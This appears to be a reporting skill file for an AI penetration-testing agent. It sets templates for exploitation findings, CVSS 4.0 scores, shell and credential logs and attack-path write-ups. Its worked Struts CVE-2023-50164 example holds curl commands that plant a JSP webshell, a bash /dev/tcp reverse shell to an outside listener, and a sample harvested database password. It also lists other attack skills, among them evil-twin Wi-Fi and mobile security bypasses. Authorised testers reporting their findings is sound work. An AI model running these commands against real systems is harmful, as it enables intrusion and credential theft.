Exploitation finding documentation — initial access reports, exploit chain documentation, CVSS v4.0 scoring, shell/credential inventory, detection gap analysis.
| name | exploit-reporting |
| description | Exploitation finding documentation — initial access reports, exploit chain documentation, CVSS v4.0 scoring, shell/credential inventory, detection gap analysis. |
| allowed-tools | Read Write |
| metadata | {"subdomain":"reporting","kind":"reporting","when_to_use":"write finding, document exploit, exploitation report, access achieved, shell obtained, credential found","tags":"report, exploit, findings, cvss, shells, creds, detection-gap","mitre_attack":null} |
Exploitation findings are only operationally useful when documented with enough precision that anyone can reproduce the access, understand the impact, and trace the full attack path. This skill defines how to structure, score, and persist exploitation findings within the Decepticon engagement directory.
Every verified successful exploitation MUST produce a finding Markdown file in the active engagement workspace's findings/ directory named FIND-{NNN}.md. The file name and id field in YAML frontmatter (FIND-001, FIND-002, ...) are the canonical cross-reference — determine the next ID by counting existing files. Do not create placeholder finding files.
---
id: FIND-001
severity: CRITICAL
cvss_score: 9.3
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
cwe: CWE-78
mitre: T1190
affected_target: 10.0.1.50
affected_component: "Apache Struts 2.5.30 — /struts2/upload.action"
confidence: confirmed
objective_id: OBJ-EXP-001
phase: initial-access
agent: exploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T14:32:00Z"
---
# [CRITICAL] Remote Code Execution via Apache Struts CVE-2023-50164 on 10.0.1.50:8080 — Root Shell Achieved
## Description
Apache Struts 2.5.30 is vulnerable to CVE-2023-50164, a file upload path traversal flaw in the `FileUploadInterceptor`. An unauthenticated attacker can manipulate the `Upload-Dir` parameter during a multipart upload request to traverse outside the intended upload directory and write an arbitrary file — including a JSP webshell — to the web root. This achieves unauthenticated remote code execution as the Tomcat service account.
The vulnerability exists because `FileUploadInterceptor` does not canonicalize the destination path before writing, allowing `../` sequences to escape the configured upload directory.
## Steps to Reproduce
```bash
# 1. Confirm the target is running Struts (identified during recon)
curl -s -I http://10.0.1.50:8080/struts2/ | grep -i server
# 2. Generate the malicious multipart upload request
# Upload a JSP webshell to /struts2/../shell.jsp (resolves to web root)
curl -s -X POST http://10.0.1.50:8080/struts2/upload.action \
-F "Upload=@/tmp/shell.jsp;type=image/jpeg" \
-F "Upload-Dir=../." \
-o /workspace/target/findings/evidence/FIND-001_upload_response.txt
# 3. Confirm shell placement
curl -s http://10.0.1.50:8080/shell.jsp?cmd=id \
-o /workspace/target/findings/evidence/FIND-001_rce_confirm.txt
# 4. Upgrade to reverse shell
curl -s "http://10.0.1.50:8080/shell.jsp?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.10.1/4444+0>%261'" &
nc -lvnp 4444
# whoami output on compromised host
tomcat
# id output
uid=52(tomcat) gid=52(tomcat) groups=52(tomcat)
# hostname
app01.internal.example.com
# uname -a
Linux app01.internal.example.com 5.15.0-1034-aws #38-Ubuntu SMP x86_64 GNU/Linux
# ip addr (abridged)
inet 10.0.1.50/24 brd 10.0.1.255 scope global eth0
inet 10.0.2.1/24 brd 10.0.2.255 scope global eth1
| Target | Access Level | Method | Credentials Used | Persistence Status |
|---|---|---|---|---|
| 10.0.1.50:8080 (app01) | Remote Code Execution (tomcat) | CVE-2023-50164 — JSP webshell | None (unauthenticated) | Webshell at /shell.jsp |
An unauthenticated attacker has OS-level command execution as the tomcat service account on app01.internal.example.com. The host has dual-network interfaces (10.0.1.0/24 external-facing + 10.0.2.0/24 internal), making it a pivot point into the internal network segment. From this position an attacker can:
| Type | Path | Description |
|---|---|---|
| HTTP response | findings/evidence/FIND-001_upload_response.txt | Server response confirming file write |
| RCE confirmation | findings/evidence/FIND-001_rce_confirm.txt | Output of id command via webshell |
| Shell session log | findings/evidence/FIND-001_shell_session.txt | Full interactive shell transcript |
| Payload | findings/evidence/FIND-001_shell.jsp | JSP webshell payload used |
| Control | Status | Notes |
|---|---|---|
| WAF | Not triggered | Multipart upload traffic not inspected |
| IDS/IPS | Not triggered | No signature match for Struts exploit pattern |
| EDR | Not triggered | Tomcat process spawning child processes not alerted |
| SIEM | No alert | No rule for unexpected JSP file creation in web root |
| File integrity monitoring | Not detected | Web root not monitored for new .jsp files |
Exploitation was not detected. The upload blended with normal application traffic. The JSP webshell at /shell.jsp remained accessible for the duration of testing with no automated response.
../ sequences.jsp and .war file creationThis finding achieves Initial Access (TA0001) via Exploit Public-Facing Application (T1190). The dual-network interface on app01 enables Lateral Movement into the 10.0.2.0/24 internal segment. Recommended next steps:
/opt/tomcat/webapps/struts2/WEB-INF/classes/*.properties for database credentialstomcat to root via local privilege escalation (see post-exploit phase)
---
## 2. Common Exploitation CVSS v4.0 Reference Scores
Use these pre-calculated vectors as a starting point. Adjust supplemental metrics (Automatable, Recovery, Provider Urgency) based on actual conditions observed.
| Finding Type | CVSS 4.0 Score | Vector | Notes |
|-------------|---------------|--------|-------|
| Unauthenticated RCE via public-facing app | 9.3 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | Adjust SC/SI/SA if scope crosses trust boundary |
| RCE requiring low-priv credentials | 8.7 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | |
| Authentication bypass (admin panel) | 9.1 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N` | Reduce VI if read-only |
| SQL injection with data read | 8.7 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N` | Raise VI to H if write confirmed |
| SQL injection with OS shell | 9.3 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | Same as RCE once shell achieved |
| Default/weak credentials — admin | 9.0 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | |
| Default/weak credentials — service account | 7.0 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N` | Raise based on actual access level |
| SSRF to internal services | 6.9 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N` | Raise SC/SI if cloud metadata accessed |
| SSRF to cloud metadata (IAM creds) | 8.8 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N` | High SC/SI due to cloud environment impact |
### CVSS 4.0 Severity Bands
| Score | Severity | Remediation SLA |
|-------|----------|----------------|
| 9.0 – 10.0 | Critical | Immediate (24 hours) |
| 7.0 – 8.9 | High | Within 7 days |
| 4.0 – 6.9 | Medium | Within 30 days |
| 0.1 – 3.9 | Low | Within 90 days |
### Key CVSS 4.0 Metrics (vs 3.1)
| Metric | CVSS 3.1 | CVSS 4.0 | Notes |
|--------|----------|----------|-------|
| Attack Complexity | AC:L / AC:H | AC:L / AC:H | Same meaning |
| Attack Requirements | — | AT:N / AT:P | New: conditions beyond attacker control |
| Scope | S:U / S:C | Removed | Replaced by SC/SI/SA (Subsequent System) |
| Subsequent System | — | SC / SI / SA | Impact on systems beyond the vulnerable one |
| Automatable | — | AU:N / AU:Y | Supplemental: can the attack be scripted at scale? |
| Recovery | — | R:A / R:U / R:I | Supplemental: how quickly does the system recover? |
---
## 3. Shell and Credential Cross-Reference
Every shell obtained and credential captured MUST be recorded in the engagement's structured JSON files AND linked back to a finding ID.
### Shell Entry — `exploit/shells.json`
```json
{
"shell_id": "SHELL-001",
"finding_id": "FIND-001",
"target": "10.0.1.50",
"hostname": "app01.internal.example.com",
"access_level": "user",
"user": "tomcat",
"uid": 52,
"groups": ["tomcat"],
"shell_type": "reverse-shell",
"method": "JSP webshell via CVE-2023-50164",
"listener": "nc -lvnp 4444",
"webshell_path": "/opt/tomcat/webapps/ROOT/shell.jsp",
"webshell_url": "http://10.0.1.50:8080/shell.jsp",
"networks": ["10.0.1.0/24", "10.0.2.0/24"],
"os": "Linux 5.15.0-1034-aws x86_64",
"obtained_at": "2026-04-06T14:35:00Z",
"persistence_status": "webshell",
"notes": "Dual-NIC host — pivot point into 10.0.2.0/24 internal segment"
}
exploit/creds_initial.json{
"cred_id": "CRED-001",
"finding_id": "FIND-002",
"source_host": "app01.internal.example.com",
"source_path": "/opt/tomcat/webapps/struts2/WEB-INF/classes/db.properties",
"type": "database",
"service": "mysql",
"target_host": "10.0.2.10",
"target_port": 3306,
"username": "appuser",
"password": "Str0ngP@ss2024!",
"hash": null,
"access_level": "application-user",
"databases": ["app_production"],
"verified": true,
"obtained_at": "2026-04-06T14:40:00Z",
"notes": "Plaintext credentials in config file on app01"
}
SHELL-NNN entry MUST have a finding_id pointing to a FIND-NNN.mdCRED-NNN entry MUST have a finding_id pointing to a FIND-NNN.mdFIND-NNN.md MUST list the shell/cred evidence path in its Evidence tableWhen multiple findings chain together to escalate access, create a PATH-NNN.md in findings/attack-paths/.
---
id: PATH-001
name: "Unauthenticated External RCE to Internal Database via App Server Pivot"
combined_severity: CRITICAL
finding_ids: [FIND-001, FIND-002, FIND-003]
created_at: "2026-04-06T15:00:00Z"
---
# PATH-001: Unauthenticated External RCE to Internal Database via App Server Pivot
## Attack Path Steps
| Order | Phase | Technique | MITRE ID | Source | Target | Tool | Detected | Finding ID |
|-------|-------|-----------|----------|--------|--------|------|----------|------------|
| 1 | Initial Access | Exploit Public-Facing Application | T1190 | Internet | 10.0.1.50:8080 | curl + JSP webshell | No | FIND-001 |
| 2 | Execution | Command and Script Interpreter: Unix Shell | T1059.004 | 10.0.1.50 | 10.0.1.50 | bash reverse shell | No | FIND-001 |
| 3 | Collection | Data from Local System | T1005 | 10.0.1.50 | /opt/tomcat/…/db.properties | cat | No | FIND-002 |
| 4 | Lateral Movement | Remote Services: Database Protocol | T1021 | 10.0.1.50 | 10.0.2.10:3306 | mysql client | No | FIND-003 |
## Narrative
Exploitation began with CVE-2023-50164 against the externally accessible Apache Struts application on `app01` (10.0.1.50:8080). The file upload path traversal vulnerability allowed placement of a JSP webshell in the Tomcat web root without authentication, achieving OS-level code execution as the `tomcat` service account (FIND-001).
With shell access on `app01`, configuration files in the deployed WAR revealed plaintext MySQL credentials for a production database on the internal network segment 10.0.2.0/24 (FIND-002). Using the `tomcat` shell as a pivot, the MySQL client was used to connect directly to `db01` (10.0.2.10:3306) with the extracted credentials, achieving full read/write access to `app_production` (FIND-003).
## Combined Severity Assessment
The three individual findings combine to produce a CRITICAL chain severity:
- FIND-001 alone is Critical (CVSS 4.0: 9.3) — unauthenticated RCE on internet-facing host
- FIND-002 escalates from code execution to credential access — no additional network exposure
- FIND-003 converts application-tier credentials into direct production database access
**Chain result**: Unauthenticated external attacker → production database read/write in three steps, zero detections.
| Chain Pattern | Combined Severity | Rationale |
|---|---|---|
| Unauthenticated RCE → internal pivot → credential access | CRITICAL | Internet to internal DB in one chain |
| Auth bypass → admin panel → config file credentials | CRITICAL | Full auth collapse + credential leak |
| Weak creds → low-priv shell → local privesc to root | CRITICAL | Full host compromise |
| SSRF → cloud metadata → IAM role theft | CRITICAL | Cloud environment takeover |
| SQLi read-only → no further escalation | HIGH | Data breach, no lateral movement |
| IDOR → read another user's PII → no further escalation | MEDIUM-HIGH | Data exposure, no system compromise |
Collect evidence during exploitation, not after. Once a session ends, some evidence may be unrecoverable.
whoami, id, hostname, ip addrdate -u on the compromised hostip route or netstat -rncurl -v output)FIND-{NNN}_{description}.txt
Examples:
FIND-001_upload_response.txt # HTTP response from exploit
FIND-001_rce_confirm.txt # id/whoami output
FIND-001_shell_session.txt # Full shell transcript
FIND-001_shell.jsp # Payload file used
FIND-002_db_properties.txt # Config file with credentials
FIND-003_mysql_dump_partial.txt # DB access proof
All evidence files go in: findings/evidence/
| Technique ID | Name | When to Tag |
|---|---|---|
| T1190 | Exploit Public-Facing Application | CVE exploitation, web app attacks, exposed services |
| T1133 | External Remote Services | VPN/RDP/SSH brute force or credential stuffing from internet |
| T1078 | Valid Accounts | Default credentials, stolen/guessed passwords |
| T1078.001 | Valid Accounts: Default Accounts | Vendor default creds (admin/admin, sa/, etc.) |
| T1078.003 | Valid Accounts: Local Accounts | Local OS account credential reuse |
| Technique ID | Name | When to Tag |
|---|---|---|
| T1059 | Command and Script Interpreter | Any shell execution post-exploit |
| T1059.001 | PowerShell | PowerShell payloads, Empire, PowerSploit |
| T1059.004 | Unix Shell | bash/sh/zsh command execution |
| T1059.006 | Python | Python one-liners, pickle payloads |
| T1203 | Exploitation for Client Execution | Client-side exploits (phishing, macro docs) |
| T1072 | Software Deployment Tools | Exploiting Jenkins, Ansible, Puppet for execution |
| Technique ID | Name | When to Tag |
|---|---|---|
| T1505.003 | Server Software Component: Web Shell | JSP, PHP, ASPX webshells deployed |
| T1053.005 | Scheduled Task/Job: Cron | Cron job persistence |
| T1136 | Create Account | New user/service account created |
/workspace/
├── exploit/
│ ├── shells.json # All shells obtained (SHELL-NNN entries)
│ └── creds_initial.json # All credentials captured (CRED-NNN entries)
├── findings/
│ ├── critical-rce-struts-cve-2023-50164-app01.md # Finding documents ({severity}-{slug}.md)
│ ├── high-plaintext-db-creds-app01-config.md
│ ├── attack-paths/
│ │ └── PATH-001.md # Multi-finding attack chain documents
│ └── evidence/
│ ├── FIND-001_upload_response.txt # Evidence keyed by finding ID
│ ├── FIND-001_rce_confirm.txt
│ ├── FIND-001_shell.jsp
│ └── FIND-002_db_properties.txt
├── roe.json
├── conops.json
├── opplan.json
└── findings.txt # Append-only cross-iteration summary
After documenting a finding, update opplan.json to close the objective and create follow-up work.
{
"objective_update": {
"id": "OBJ-EXP-001",
"status": "completed",
"result": "RCE achieved on app01 (10.0.1.50) via CVE-2023-50164. Tomcat shell obtained. See FIND-001.",
"finding_ids": ["FIND-001"]
},
"new_objectives": [
{
"id": "OBJ-EXP-002",
"phase": "exploitation",
"description": "Read config files on app01 to extract database credentials",
"acceptance_criteria": "Credentials documented in creds_initial.json with verified:true",
"priority": 1,
"depends_on": "FIND-001"
},
{
"id": "OBJ-POST-001",
"phase": "post-exploitation",
"description": "Enumerate internal network 10.0.2.0/24 via app01 pivot shell",
"acceptance_criteria": "Live hosts and open ports documented in findings",
"priority": 2,
"depends_on": "FIND-001"
}
]
}
Also append a one-line summary to findings.txt:
[2026-04-06T14:35:00Z] FIND-001 CRITICAL — RCE on app01 (10.0.1.50) via CVE-2023-50164 (Struts). Tomcat shell. Dual-NIC pivot into 10.0.2.0/24. Not detected.
Before marking an exploitation objective as complete:
{severity}-{slug}.md finding file created with all required frontmatter fields populatedwhoami/id/hostname outputfindings/evidence/ with correct namingexploit/shells.json (if shell obtained)exploit/creds_initial.json (if creds captured)opplan.json objective status set to completed with finding_idsopplan.json for post-exploit phasefindings.txtfindings/attack-paths/ if 2+ findings chainWeb application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.
HTTP Request Smuggling (HRS) — front-end / back-end parser disagreement attacks that desync the proxy stack. Covers CL.TE, TE.CL, TE.TE, CL.0, HTTP/2 downgrade (h2.cl, h2.te), pipelining, and connection-state pinning. Includes a confirm-desync gate, header obfuscation catalog, and minimal raw-socket Python harnesses (no smuggler.py available in sandbox).
Use when the engagement target is an Android (APK / AAB) or iOS (IPA) application. Covers static analysis (jadx, apktool, class-dump), dynamic instrumentation via Frida and Objection, SSL-pinning bypass, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported-component attacks, IPC redirection, WebView vulnerabilities, and biometric / Face ID / Touch ID bypass.
Web application enumeration hub — directory/file fuzzing, vhost discovery, API enumeration, CMS scanning, WAF detection, auth surface mapping, cookie audit.
Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.
Top-level index for the Decepticon 802.11 wireless attack suite. Routes the WirelessOperator to the correct leaf skill based on the target AP's crypto column (PSK / SAE / MGT / WPS) and engagement posture. BLE, Zigbee, Z-Wave, LoRaWAN, and sub-GHz live under iot/ by design — link provided below to prevent duplication.